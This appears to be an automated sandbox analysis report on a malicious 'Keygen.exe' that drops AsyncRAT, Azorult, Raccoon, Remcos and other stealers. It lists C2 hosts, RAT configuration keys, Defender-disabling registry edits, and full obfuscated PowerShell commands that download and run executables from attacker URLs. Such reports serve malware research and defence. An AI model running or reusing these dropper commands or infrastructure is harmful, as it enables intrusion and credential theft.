asyncrat | 1bf6d14c4b5f59aa30882f4aa25e9e9d703dac905a785fe020ff667600e5fc97

Analysis

max time kernel
307s
max time network
305s
platform
windows10_x64
resource
win10v20201028
submitted
18-11-2020 15:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Keygen.exe

Score

10^/10

asyncrat azorult modiloader oski raccoon remcos 5e4db353b88c002ba6466c06437973619aad03b3 discovery evasion infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Family

raccoon

Botnet

5e4db353b88c002ba6466c06437973619aad03b3

Attributes

url4cnc
https://telete.in/brikitiki

rc4.plain

Extracted

Family

azorult

http://195.245.112.115/index.php

Extracted

Family

asyncrat

Version

0.5.7B

agentttt.ac.ug:6970

agentpurple.ac.ug:6970

Mutex

AsyncMutex_6SI8OkPnk

Attributes

aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
anti_detection
false
autorun
false
bdos
false
delay
Default
host
agentttt.ac.ug,agentpurple.ac.ug
hwid
3
install_file
install_folder
%AppData%
mutex
AsyncMutex_6SI8OkPnk
pastebin_config
null
port
6970
version
0.5.7B

aes.plain

Extracted

Family

remcos

taenaia.ac.ug:6969

agentpapple.ac.ug:6969

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult

Contains code to disable Windows Defender 4 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
behavioral11/memory/1620-247-0x0000000000400000-0x000000000040C000-memory.dmp	disable_win_def
behavioral11/memory/1620-248-0x000000000040616E-mapping.dmp	disable_win_def
behavioral11/memory/4252-267-0x0000000000400000-0x0000000000408000-memory.dmp	disable_win_def
behavioral11/memory/4252-269-0x0000000000403BEE-mapping.dmp	disable_win_def

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Oski
Oski is an infostealer targeting browser data, crypto wallets.
infostealer oski
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Async RAT payload 2 IoCs

rat

Processes:

resource	yara_rule
behavioral11/memory/1288-238-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat
behavioral11/memory/1288-239-0x000000000040C76E-mapping.dmp	asyncrat

ModiLoader First Stage 1 IoCs

Processes:

resource	yara_rule
behavioral11/memory/4148-297-0x0000000002A70000-0x0000000002ACC000-memory.dmp	modiloader_stage1

Blocklisted process makes network request 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

19 636 powershell.exe
20 2692 powershell.exe
21 1900 powershell.exe
25 636 powershell.exe
26 2692 powershell.exe
27 1900 powershell.exe
Downloads MZ/PE file

flow	pid	process
19	636	powershell.exe
20	2692	powershell.exe
21	1900	powershell.exe
25	636	powershell.exe
26	2692	powershell.exe
27	1900	powershell.exe

Executes dropped EXE 25 IoCs

Processes:

Keygen.exeoze.exeyft.exexnl.exeFGbfttrev.exeFGbfttrev.exeFDvbcgfert.exexnl.exeFGbfttrev.exeFGbfttrev.exeFDvbcgfert.exeazchgftrq.exeoze.exekb9xDX33cv.exeBPtrSK8Zg4.exe5ryO9HMQPs.exeBJccGCNE9z.exekb9xDX33cv.exekb9xDX33cv.exe5ryO9HMQPs.exeBJccGCNE9z.exeozchgftrq.exeazchgftrq.exeozchgftrq.exeozchgftrq.exe

pid	process
3728	Keygen.exe
4908	oze.exe
4932	yft.exe
4920	xnl.exe
3464	FGbfttrev.exe
1732	FGbfttrev.exe
2272	FDvbcgfert.exe
2364	xnl.exe
4440	FGbfttrev.exe
4452	FGbfttrev.exe
4428	FDvbcgfert.exe
508	azchgftrq.exe
4128	oze.exe
3472	kb9xDX33cv.exe
4148	BPtrSK8Zg4.exe
4644	5ryO9HMQPs.exe
4940	BJccGCNE9z.exe
1780	kb9xDX33cv.exe
1288	kb9xDX33cv.exe
1620	5ryO9HMQPs.exe
4252	BJccGCNE9z.exe
3856	ozchgftrq.exe
4528	azchgftrq.exe
2684	ozchgftrq.exe
2852	ozchgftrq.exe

Loads dropped DLL 11 IoCs

Processes:

xnl.exeozchgftrq.exe

pid	process
2364	xnl.exe
2364	xnl.exe
2364	xnl.exe
2364	xnl.exe
2364	xnl.exe
2364	xnl.exe
2364	xnl.exe
2364	xnl.exe
2852	ozchgftrq.exe
2852	ozchgftrq.exe
2852	ozchgftrq.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

BJccGCNE9z.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	BJccGCNE9z.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	BJccGCNE9z.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

BPtrSK8Zg4.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\Zsle = "C:\\Users\\Admin\\AppData\\Local\\elsZ.url"	BPtrSK8Zg4.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Drops desktop.ini file(s) 1 IoCs

Processes:

xnl.exe

description ioc process

File created C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini xnl.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

Processes:

xnl.exeFGbfttrev.exeFGbfttrev.exeFDvbcgfert.exe

pid process

2364 xnl.exe
2364 xnl.exe
4440 FGbfttrev.exe
4440 FGbfttrev.exe
4452 FGbfttrev.exe
4452 FGbfttrev.exe
4428 FDvbcgfert.exe
4428 FDvbcgfert.exe

description	ioc	process
File created	C:\Users\Admin\AppData\LocalLow\n9h9r91h8fna789q\desktop.ini	xnl.exe

Suspicious use of SetThreadContext 11 IoCs

Processes:

xnl.exeFGbfttrev.exeFGbfttrev.exeFDvbcgfert.exeoze.exekb9xDX33cv.exe5ryO9HMQPs.exeBJccGCNE9z.exeazchgftrq.exeozchgftrq.exeBPtrSK8Zg4.exe

description	pid	process	target process
PID 4920 set thread context of 2364	4920	xnl.exe	xnl.exe
PID 1732 set thread context of 4440	1732	FGbfttrev.exe	FGbfttrev.exe
PID 3464 set thread context of 4452	3464	FGbfttrev.exe	FGbfttrev.exe
PID 2272 set thread context of 4428	2272	FDvbcgfert.exe	FDvbcgfert.exe
PID 4908 set thread context of 4128	4908	oze.exe	oze.exe
PID 3472 set thread context of 1288	3472	kb9xDX33cv.exe	kb9xDX33cv.exe
PID 4644 set thread context of 1620	4644	5ryO9HMQPs.exe	5ryO9HMQPs.exe
PID 4940 set thread context of 4252	4940	BJccGCNE9z.exe	BJccGCNE9z.exe
PID 508 set thread context of 4528	508	azchgftrq.exe	azchgftrq.exe
PID 3856 set thread context of 2852	3856	ozchgftrq.exe	ozchgftrq.exe
PID 4148 set thread context of 2388	4148	BPtrSK8Zg4.exe	ieinstal.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

FDvbcgfert.exeozchgftrq.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	FDvbcgfert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ozchgftrq.exe

Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

1164 timeout.exe
944 timeout.exe
4124 timeout.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

3476 taskkill.exe
4976 taskkill.exe
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings cmd.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3468 reg.exe

pid	process
1164	timeout.exe
944	timeout.exe
4124	timeout.exe

pid	process
3476	taskkill.exe
4976	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings	cmd.exe

pid	process
3468	reg.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

BPtrSK8Zg4.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	BPtrSK8Zg4.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	BPtrSK8Zg4.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exekb9xDX33cv.exe5ryO9HMQPs.exe

pid	process
640	powershell.exe
2692	powershell.exe
1900	powershell.exe
636	powershell.exe
4024	powershell.exe
2088	powershell.exe
636	powershell.exe
640	powershell.exe
2692	powershell.exe
2088	powershell.exe
4024	powershell.exe
1900	powershell.exe
640	powershell.exe
4024	powershell.exe
636	powershell.exe
2692	powershell.exe
1900	powershell.exe
2088	powershell.exe
3472	kb9xDX33cv.exe
3472	kb9xDX33cv.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe
1620	5ryO9HMQPs.exe

Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

xnl.exeFGbfttrev.exeFGbfttrev.exeFDvbcgfert.exe

pid process

4920 xnl.exe
1732 FGbfttrev.exe
3464 FGbfttrev.exe
2272 FDvbcgfert.exe

pid	process
4920	xnl.exe
1732	FGbfttrev.exe
3464	FGbfttrev.exe
2272	FDvbcgfert.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exeoze.exekb9xDX33cv.exe5ryO9HMQPs.exe5ryO9HMQPs.exeBJccGCNE9z.exepowershell.exeazchgftrq.exeozchgftrq.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	640	powershell.exe
Token: SeDebugPrivilege	2692	powershell.exe
Token: SeDebugPrivilege	4024	powershell.exe
Token: SeDebugPrivilege	1900	powershell.exe
Token: SeDebugPrivilege	636	powershell.exe
Token: SeDebugPrivilege	2088	powershell.exe
Token: SeDebugPrivilege	3476	taskkill.exe
Token: SeDebugPrivilege	4908	oze.exe
Token: SeDebugPrivilege	3472	kb9xDX33cv.exe
Token: SeDebugPrivilege	4644	5ryO9HMQPs.exe
Token: SeDebugPrivilege	1620	5ryO9HMQPs.exe
Token: SeDebugPrivilege	4940	BJccGCNE9z.exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	508	azchgftrq.exe
Token: SeDebugPrivilege	3856	ozchgftrq.exe
Token: SeDebugPrivilege	4976	taskkill.exe

Suspicious use of FindShellTrayWindow 12 IoCs

Processes:

Keygen.exe

pid	process
3728	Keygen.exe
3728	Keygen.exe
3728	Keygen.exe
3728	Keygen.exe
3728	Keygen.exe
3728	Keygen.exe
3728	Keygen.exe
3728	Keygen.exe
3728	Keygen.exe
3728	Keygen.exe
3728	Keygen.exe
3728	Keygen.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

Keygen.exexnl.exeyft.exeFGbfttrev.exeFGbfttrev.exeFDvbcgfert.exe5ryO9HMQPs.exe

pid process

3728 Keygen.exe
4920 xnl.exe
4932 yft.exe
3464 FGbfttrev.exe
1732 FGbfttrev.exe
2272 FDvbcgfert.exe
1620 5ryO9HMQPs.exe
1620 5ryO9HMQPs.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Keygen.execmd.exemshta.exemshta.exemshta.exemshta.exemshta.exemshta.exepowershell.exepowershell.exepowershell.exexnl.exeyft.exe

description	pid	process	target process
PID 528 wrote to memory of 2440	528	Keygen.exe	cmd.exe
PID 528 wrote to memory of 2440	528	Keygen.exe	cmd.exe
PID 528 wrote to memory of 2440	528	Keygen.exe	cmd.exe
PID 2440 wrote to memory of 3728	2440	cmd.exe	Keygen.exe
PID 2440 wrote to memory of 3728	2440	cmd.exe	Keygen.exe
PID 2440 wrote to memory of 3728	2440	cmd.exe	Keygen.exe
PID 2440 wrote to memory of 1020	2440	cmd.exe	mshta.exe
PID 2440 wrote to memory of 1020	2440	cmd.exe	mshta.exe
PID 2440 wrote to memory of 1020	2440	cmd.exe	mshta.exe
PID 2440 wrote to memory of 3608	2440	cmd.exe	mshta.exe
PID 2440 wrote to memory of 3608	2440	cmd.exe	mshta.exe
PID 2440 wrote to memory of 3608	2440	cmd.exe	mshta.exe
PID 2440 wrote to memory of 1164	2440	cmd.exe	timeout.exe
PID 2440 wrote to memory of 1164	2440	cmd.exe	timeout.exe
PID 2440 wrote to memory of 1164	2440	cmd.exe	timeout.exe
PID 2440 wrote to memory of 2988	2440	cmd.exe	mshta.exe
PID 2440 wrote to memory of 2988	2440	cmd.exe	mshta.exe
PID 2440 wrote to memory of 2988	2440	cmd.exe	mshta.exe
PID 2440 wrote to memory of 1932	2440	cmd.exe	mshta.exe
PID 2440 wrote to memory of 1932	2440	cmd.exe	mshta.exe
PID 2440 wrote to memory of 1932	2440	cmd.exe	mshta.exe
PID 2440 wrote to memory of 944	2440	cmd.exe	timeout.exe
PID 2440 wrote to memory of 944	2440	cmd.exe	timeout.exe
PID 2440 wrote to memory of 944	2440	cmd.exe	timeout.exe
PID 2440 wrote to memory of 1268	2440	cmd.exe	mshta.exe
PID 2440 wrote to memory of 1268	2440	cmd.exe	mshta.exe
PID 2440 wrote to memory of 1268	2440	cmd.exe	mshta.exe
PID 2440 wrote to memory of 3396	2440	cmd.exe	mshta.exe
PID 2440 wrote to memory of 3396	2440	cmd.exe	mshta.exe
PID 2440 wrote to memory of 3396	2440	cmd.exe	mshta.exe
PID 3396 wrote to memory of 640	3396	mshta.exe	powershell.exe
PID 3396 wrote to memory of 640	3396	mshta.exe	powershell.exe
PID 3396 wrote to memory of 640	3396	mshta.exe	powershell.exe
PID 2988 wrote to memory of 1900	2988	mshta.exe	powershell.exe
PID 2988 wrote to memory of 1900	2988	mshta.exe	powershell.exe
PID 2988 wrote to memory of 1900	2988	mshta.exe	powershell.exe
PID 3608 wrote to memory of 4024	3608	mshta.exe	powershell.exe
PID 3608 wrote to memory of 4024	3608	mshta.exe	powershell.exe
PID 3608 wrote to memory of 4024	3608	mshta.exe	powershell.exe
PID 1932 wrote to memory of 2088	1932	mshta.exe	powershell.exe
PID 1932 wrote to memory of 2088	1932	mshta.exe	powershell.exe
PID 1932 wrote to memory of 2088	1932	mshta.exe	powershell.exe
PID 1020 wrote to memory of 636	1020	mshta.exe	powershell.exe
PID 1020 wrote to memory of 636	1020	mshta.exe	powershell.exe
PID 1020 wrote to memory of 636	1020	mshta.exe	powershell.exe
PID 1268 wrote to memory of 2692	1268	mshta.exe	powershell.exe
PID 1268 wrote to memory of 2692	1268	mshta.exe	powershell.exe
PID 1268 wrote to memory of 2692	1268	mshta.exe	powershell.exe
PID 1900 wrote to memory of 4908	1900	powershell.exe	oze.exe
PID 1900 wrote to memory of 4908	1900	powershell.exe	oze.exe
PID 1900 wrote to memory of 4908	1900	powershell.exe	oze.exe
PID 636 wrote to memory of 4932	636	powershell.exe	yft.exe
PID 636 wrote to memory of 4932	636	powershell.exe	yft.exe
PID 636 wrote to memory of 4932	636	powershell.exe	yft.exe
PID 2692 wrote to memory of 4920	2692	powershell.exe	xnl.exe
PID 2692 wrote to memory of 4920	2692	powershell.exe	xnl.exe
PID 2692 wrote to memory of 4920	2692	powershell.exe	xnl.exe
PID 4920 wrote to memory of 3464	4920	xnl.exe	FGbfttrev.exe
PID 4920 wrote to memory of 3464	4920	xnl.exe	FGbfttrev.exe
PID 4920 wrote to memory of 3464	4920	xnl.exe	FGbfttrev.exe
PID 4932 wrote to memory of 1732	4932	yft.exe	FGbfttrev.exe
PID 4932 wrote to memory of 1732	4932	yft.exe	FGbfttrev.exe
PID 4932 wrote to memory of 1732	4932	yft.exe	FGbfttrev.exe
PID 4920 wrote to memory of 2272	4920	xnl.exe	FDvbcgfert.exe

C:\Users\Admin\AppData\Local\Temp\Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:528

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BB95.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2440

C:\Users\Admin\AppData\Local\Temp\BB95.tmp\Keygen.exe
Keygen.exe
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3728

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BB95.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:1020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:636

C:\Users\Public\yft.exe
"C:\Users\Public\yft.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4932

C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1732

C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
"C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
7⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4440

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BB95.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:3608

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4024

C:\Windows\SysWOW64\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:1164

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\BB95.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:2988

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
